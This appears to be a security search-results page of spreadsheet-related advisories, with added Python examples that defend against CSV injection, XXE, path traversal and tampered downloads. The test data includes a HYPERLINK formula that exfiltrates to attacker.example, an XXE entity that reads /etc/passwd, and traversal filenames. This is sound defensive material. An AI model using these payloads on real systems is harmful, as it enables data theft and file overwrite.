133 matches found
Cypheroth - Automated, Extensible Toolset That Runs Cypher Queries Against Bloodhound's Neo4j Backend And Saves Output To Spreadsheets
Automated, extensible toolset that runs Cypher queries against BloodHound's Neo4j backend and saves output to spreadsheets. Description: This is a bash script that automates running Cypher queries against BloodHound data stored in a Neo4j database. I found myself re-running the same queries throug...
PT-2021-2274 · Microsoft · Office Excel
Name of the Vulnerable Software and Affected Versions: Microsoft Excel (affected versions not specified). Description: The issue is related to incorrect code generation management in Microsoft Excel. It allows a remote attacker to execute arbitrary code. The vulnerability can be exploited through th...
PT-2021-2035 · Microsoft · Office Web Apps Server +4
Name of the Vulnerable Software and Affected Versions: Microsoft Excel (affected versions not specified); Microsoft Office (affected versions not specified); Microsoft 365 Apps for Enterprise (affected versions not specified); Microsoft Office Web Apps Server (affected versions not specified); Microsoft Offi...
Facebook WhatsApp Path Traversal Vulnerability
Facebook WhatsApp is a suite of mobile applications from Facebook Inc. (United States) that use the Internet to send text messages. The application uses the contact information on a smartphone to find other users of the program and send them text, pictures, etc. WhatsApp Business is the commercia...
CVE-2020-1904
A path validation issue in WhatsApp for iOS prior to v2.20.61 and WhatsApp Business for iOS prior to v2.20.61 could have allowed directory traversal, overwriting files, when sending specially crafted docx, xlsx, and pptx files as attachments to messages...
Microsoft Overhauls ‘Patch Tuesday’ Security Update Guide
Microsoft has updated its Security Update Guide, which is used by tens of millions of cybersecurity professionals the second Tuesday of every month, also known as Patch Tuesday. The update, according to Microsoft, is meant to deliver a more intuitive user experience. For its latest update,...
CVE-2019-14749
An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. CSV (aka formula) injection exists in the export-spreadsheets functionality. These spreadsheets are generated dynamically from unvalidated or unfiltered user input in the Name and Internal Notes fields in the Users tab, and...
Design/Logic Flaw
An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. CSV (aka formula) injection exists in the export-spreadsheets functionality. These spreadsheets are generated dynamically from unvalidated or unfiltered user input in the Name and Internal Notes fields in the Users tab, and...
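The osTicket entries above describe the classic CSV/formula injection pattern: user-controlled text is written straight into an exported spreadsheet, and a cell that begins with `=`, `+`, `-`, `@`, tab or carriage return is evaluated as a formula when the file is opened. The following is an added example, not osTicket's code, of an exporter that applies the usual mitigation: quote every field and prefix any cell that would otherwise be interpreted as a formula with a single apostrophe. The header names and the row data are constructed for the demo.

```python
"""CSV export that neutralises formula injection (added example; the column
names and rows below are constructed, not osTicket data)."""
import csv
import io

# A cell starting with one of these is evaluated as a formula (or a DDE
# command) by Excel and LibreOffice when the CSV is opened.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value) -> str:
    """Return the cell as text, prefixed with an apostrophe if a spreadsheet
    application would otherwise interpret it as a formula."""
    text = "" if value is None else str(value)
    if not text:
        return text
    # Check both the raw first character and the first non-blank one, so
    # "  =cmd" is treated as conservatively as "=cmd".
    if text[0] in FORMULA_TRIGGERS or text.lstrip()[:1] in ("=", "+", "-", "@"):
        return "'" + text
    return text


def export_rows(header, rows) -> str:
    """Write header and rows as CSV with every field quoted and neutralised.
    QUOTE_ALL also doubles any embedded quotes, so a payload cannot break out
    of its field."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow([neutralize_cell(h) for h in header])
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample: a user whose Name and Internal Notes carry payloads of
# the kind an attacker would enter through the web UI.
SAMPLE_HEADER = ["Name", "Email", "Internal Notes"]
SAMPLE_ROWS = [
    ['=HYPERLINK("https://attacker.example/?x="&A1,"Open")', "jane@example.org", "regular customer"],
    ["John Smith", "john@example.org", "@SUM(1,2) followed by notes"],
    ["Pat Lee", "pat@example.org", "-10 days overdue"],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_HEADER, SAMPLE_ROWS))
```

Two caveats a practitioner should keep in mind: the apostrophe is shown as literal content by some importers, so for a column that is genuinely numeric (the `-10` case) it is better to emit a typed xlsx cell than a CSV string; and the prefix must be applied at export time to every cell, not only to the fields you happen to know are user-controlled.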
Insider Logic Bombs
Add to the "not very smart criminals" file: According to court documents, Tinley provided software services for Siemens' Monroeville, PA offices for nearly ten years. Among the work he was asked to perform was the creation of spreadsheets that the company was using to manage equipment orders. The...
Siemens Contractor Pleads Guilty to Planting 'Logic Bomb' in Spreadsheets
A former Siemens contractor pleaded guilty in federal court on Friday to secretly planting code in automated spreadsheets he had created for the company over a decade ago that deliberately crashes the program every few years. David Tinley, a 62-year-old resident of Harrison City, Pennsylvania, w...
Hostintel - A Modular Python Application To Collect Intelligence For Malicious Hosts
Hostintel collects intelligence on hosts from various sources. It is written in a modular fashion so that new intelligence sources can be added easily. Hosts are identified by FQDN, domain, or IP address. Only IPv4 is supported at the moment. The output is in CSV format an...
GHSA-4XR4-4C65-HJ7F Apache Tika does not properly initialize the XML parser or choose handlers
Apache Tika before 1.13 does not properly initialize the XML parser or choose handlers, which might allow remote attackers to conduct XML External Entity (XXE) attacks via vectors involving (1) spreadsheets in OOXML files and (2) XMP metadata in PDF and other file formats, a related issue to...
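The Tika advisory above is about XML parts inside an OOXML container (an xlsx is a zip of XML files) being handed to a parser that still honours DOCTYPE and entity declarations. The example below is added here and is not Apache Tika's code: it reads the `xl/sharedStrings.xml` part of a minimal xlsx-like zip constructed in the block, using the standard-library expat parser with handlers that abort on any DOCTYPE, entity declaration or external entity reference (OOXML parts never legitimately carry a DTD, so refusing all of them costs nothing). It also caps the declared size of the part before inflating it, which guards against the memory-exhaustion class of bug rather than XXE. The XXE payload and the benign part are constructed for the demo.

```python
"""Parse an OOXML sharedStrings part without resolving DTDs or entities
(added example; the xlsx-like zip and XML parts are constructed here)."""
import io
import zipfile
import xml.parsers.expat

MAX_PART_BYTES = 50 * 1024 * 1024  # cap on one decompressed XML part (assumed limit)


class UnsafeXML(Exception):
    """Raised when a part carries a DOCTYPE, an entity, or an external reference."""


def parse_shared_strings(xml_bytes: bytes) -> list:
    """Return the text of each <si> element in a sharedStrings.xml part."""
    parser = xml.parsers.expat.ParserCreate()
    strings, buf, state = [], [], {"in_t": False}

    def reject(*_args):
        # Raising inside an expat handler aborts Parse() with this exception.
        raise UnsafeXML("DOCTYPE/entity declarations are not allowed in OOXML parts")

    # Refuse the DTD before any entity can be defined; the other two handlers
    # are defence in depth should a parser ever reach them.
    parser.StartDoctypeDeclHandler = reject
    parser.EntityDeclHandler = reject
    parser.ExternalEntityRefHandler = reject

    def local(name):
        return name.rsplit(":", 1)[-1]   # tolerate a prefixed spreadsheetml namespace

    def start(name, _attrs):
        if local(name) == "si":
            buf.clear()
        elif local(name) == "t":
            state["in_t"] = True

    def end(name):
        if local(name) == "t":
            state["in_t"] = False
        elif local(name) == "si":
            strings.append("".join(buf))   # rich-text runs (<r><t>) are concatenated

    def chars(data):
        if state["in_t"]:
            buf.append(data)

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(xml_bytes, True)
    return strings


def load_shared_strings(xlsx_bytes: bytes) -> list:
    """Open the container, bound the part size, then parse the part."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        info = zf.getinfo("xl/sharedStrings.xml")
        if info.file_size > MAX_PART_BYTES:   # declared uncompressed size
            raise UnsafeXML(f"part too large: {info.file_size} bytes")
        data = zf.read(info)
    return parse_shared_strings(data)


def part_is_safe(xlsx_bytes: bytes) -> bool:
    try:
        load_shared_strings(xlsx_bytes)
        return True
    except UnsafeXML:
        return False


def build_xlsx(shared_strings_xml: str) -> bytes:
    """Constructed minimal container holding only the part this demo parses."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/sharedStrings.xml", shared_strings_xml)
    return buf.getvalue()


NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
BENIGN = ('<?xml version="1.0" encoding="UTF-8"?>'
          f'<sst xmlns="{NS}" count="2" uniqueCount="2">'
          '<si><t>Invoice</t></si><si><r><t>Total </t></r><r><t>due</t></r></si></sst>')
# Constructed XXE part of the kind the advisory describes: an external entity
# declared in a spreadsheet part and referenced from a cell string.
XXE = ('<?xml version="1.0"?>'
       '<!DOCTYPE sst [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
       f'<sst xmlns="{NS}"><si><t>&xxe;</t></si></sst>')

if __name__ == "__main__":
    print(load_shared_strings(build_xlsx(BENIGN)))
    print("xxe part accepted:", part_is_safe(build_xlsx(XXE)))
```

Because every DOCTYPE is rejected outright, the same guard also stops entity-expansion (billion laughs) payloads, which need an internal subset to define the entities.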
Open-Xchange (OX) App Suite Path Traversal Vulnerability (Jun 2018)
Open-Xchange OX App Suite is prone to a path traversal vulnerability. Copyright (C) 2018 Greenbone Networks GmbH. Some text descriptions might be excerpted from referenced sources and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later. This program is free...
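The WhatsApp entry (CVE-2020-1904) and the OX App Suite entry above are both instances of the same bug class: a filename chosen by the sender or attacker is used to build a path on the receiving side, and `../` sequences (or their backslash and Unicode equivalents) let the write land outside the intended directory. The following is an added example, not code from either product, of how an attachment handler can reduce an untrusted name to a single safe path component and then, independently, verify that the resolved path is still inside the store before writing. The extension allow-list, the store path and the sample names are assumptions for the demo.

```python
"""Place an attachment under a store directory using its untrusted filename
(added example; the allow-list, store path and sample names are constructed)."""
import os
import posixpath
import re
import unicodedata

ALLOWED_EXTENSIONS = {".docx", ".xlsx", ".pptx", ".pdf", ".png", ".jpg"}


def sanitize_attachment_name(name: str) -> str:
    """Reduce an attacker-controlled name to one safe path component."""
    # Fold compatibility characters (e.g. fullwidth slashes) before looking
    # for separators, so they cannot slip past the basename step below.
    name = unicodedata.normalize("NFKC", name)
    # Drop NUL and other control characters that truncate names in native code.
    name = "".join(ch for ch in name if ch.isprintable())
    # Treat both separator styles as separators and keep only the last component.
    name = posixpath.basename(name.replace("\\", "/"))
    # Replace anything outside a conservative character set.
    name = re.sub(r"[^A-Za-z0-9._-]+", "_", name)
    # "." and ".." collapse to nothing here and are rejected.
    name = name.strip(".")
    if not name:
        raise ValueError("attachment name has no usable characters")
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed")
    return name


def resolve_attachment_path(store_dir: str, untrusted_name: str) -> str:
    """Return the absolute path to write, or raise if it would leave store_dir."""
    safe_name = sanitize_attachment_name(untrusted_name)
    base = os.path.realpath(store_dir)
    candidate = os.path.realpath(os.path.join(base, safe_name))
    # Defence in depth: check containment after symlink resolution, so the
    # decision does not rest on the sanitiser alone.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the attachment store")
    return candidate


def is_accepted(store_dir: str, untrusted_name: str) -> bool:
    try:
        resolve_attachment_path(store_dir, untrusted_name)
        return True
    except ValueError:
        return False


# Constructed attachment names of the kind a crafted message could carry.
SAMPLES = [
    "report.xlsx",
    "../../../etc/passwd.docx",
    "..\\..\\Library\\Preferences\\evil.pptx",
    "..",
    "shell.php",
]

if __name__ == "__main__":
    for n in SAMPLES:
        if is_accepted("/srv/attachments", n):
            print(repr(n), "->", resolve_attachment_path("/srv/attachments", n))
        else:
            print(repr(n), "-> rejected")
```

The sanitiser deliberately discards any directory information the sender supplied; if the application needs per-conversation or per-user subdirectories, it should derive those from its own trusted identifiers and never from the attachment name.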
CVE-2016-10585
libxl provides Node bindings for the libxl library for reading and writing Excel XLS and XLSX spreadsheets. libxl downloads zipped resources over HTTP, which leaves it vulnerable to MITM attacks. It may be possible to cause remote code execution (RCE) by swapping out the requested zip file with an...
CVE-2016-10585
CVE-2016-10585 affects the libxl bindings for Node.js. The library downloads zipped resources over HTTP, enabling MITM attacks in which an attacker in a privileged network position swaps the downloaded zip for a malicious one, potentially causing remote code execution on the host running l...
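The two CVE-2016-10585 entries above describe an install-time fetch with no transport security and no integrity check, so whoever sits on the path can hand the installer an arbitrary archive. The example below is added here and is not libxl's code: it shows the two controls that close that gap, refusing any non-TLS URL and accepting the payload only if its SHA-256 matches a digest pinned in the package itself (never one fetched alongside the download). The archives, URLs and the `fetch` callback that stands in for the network are constructed for the demo.

```python
"""Accept a downloaded archive only over TLS and only if it matches a pinned
SHA-256 (added example; archives, URLs and the fetch stub are constructed)."""
import hashlib
import hmac
import io
import zipfile
from urllib.parse import urlsplit


class DownloadRejected(Exception):
    pass


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_archive(url: str, payload: bytes, pinned_sha256: str) -> zipfile.ZipFile:
    """Return an opened ZipFile only if url is https and payload matches the pin."""
    if urlsplit(url).scheme != "https":
        raise DownloadRejected(f"refusing non-TLS download: {url}")
    actual = sha256_hex(payload)
    # Constant-time compare; the pin ships with the package, not with the download.
    if not hmac.compare_digest(actual, pinned_sha256.lower()):
        raise DownloadRejected(f"digest mismatch: expected {pinned_sha256}, got {actual}")
    try:
        return zipfile.ZipFile(io.BytesIO(payload))
    except zipfile.BadZipFile as exc:
        raise DownloadRejected("verified payload is not a zip archive") from exc


def download_is_acceptable(url: str, payload: bytes, pinned_sha256: str) -> bool:
    try:
        verify_archive(url, payload, pinned_sha256)
        return True
    except DownloadRejected:
        return False


def build_archive(files: dict) -> bytes:
    """Constructed archive with fixed timestamps so its digest is reproducible."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in sorted(files.items()):
            info = zipfile.ZipInfo(name, date_time=(2020, 1, 1, 0, 0, 0))
            info.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(info, data)
    return buf.getvalue()


# Stand-in for the vendor release. In practice PINNED is a constant committed
# to the package; it is computed here only so the demo is self-contained.
GENUINE = build_archive({"libxl/lib/libxl.so": b"\x7fELF genuine library bytes (constructed)"})
PINNED = sha256_hex(GENUINE)
# What an on-path attacker substitutes when the fetch goes over plain HTTP.
TAMPERED = build_archive({"libxl/lib/libxl.so": b"\x7fELF attacker payload (constructed)"})


def simulate(fetch, url: str, pin: str):
    """fetch(url) -> bytes stands in for the network. Returns the archive's
    member names on success, otherwise the rejection reason."""
    try:
        with verify_archive(url, fetch(url), pin) as zf:
            return zf.namelist()
    except DownloadRejected as exc:
        return str(exc)


if __name__ == "__main__":
    print(simulate(lambda u: GENUINE, "https://vendor.example/libxl.zip", PINNED))
    print(simulate(lambda u: TAMPERED, "https://vendor.example/libxl.zip", PINNED))
    print(simulate(lambda u: GENUINE, "http://vendor.example/libxl.zip", PINNED))
```

The digest check is what actually defeats the substitution; the HTTPS requirement on its own only raises the bar, since a CDN or mirror compromise delivers the same result over TLS. Extraction of the verified archive still needs its own path checks, for the same reason as the attachment example earlier on this page.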
poi: Parsing of multiple file types can cause a denial of service via infinite loop or out of memory exception
Apache POI in versions prior to release 3.17 is vulnerable to denial-of-service attacks: (1) infinite loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294), and (2) out-of-memory exceptions while parsing crafted DOC, PPT and XLS (POI bugs 52372 and 61295)...
Debian DSA-4129-1 : freexl - security update
Multiple heap buffer over-reads were discovered in freexl, a library to read Microsoft Excel spreadsheets, which could result in denial of service. (C) Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from Debian Security Advisory DSA-4129. The te...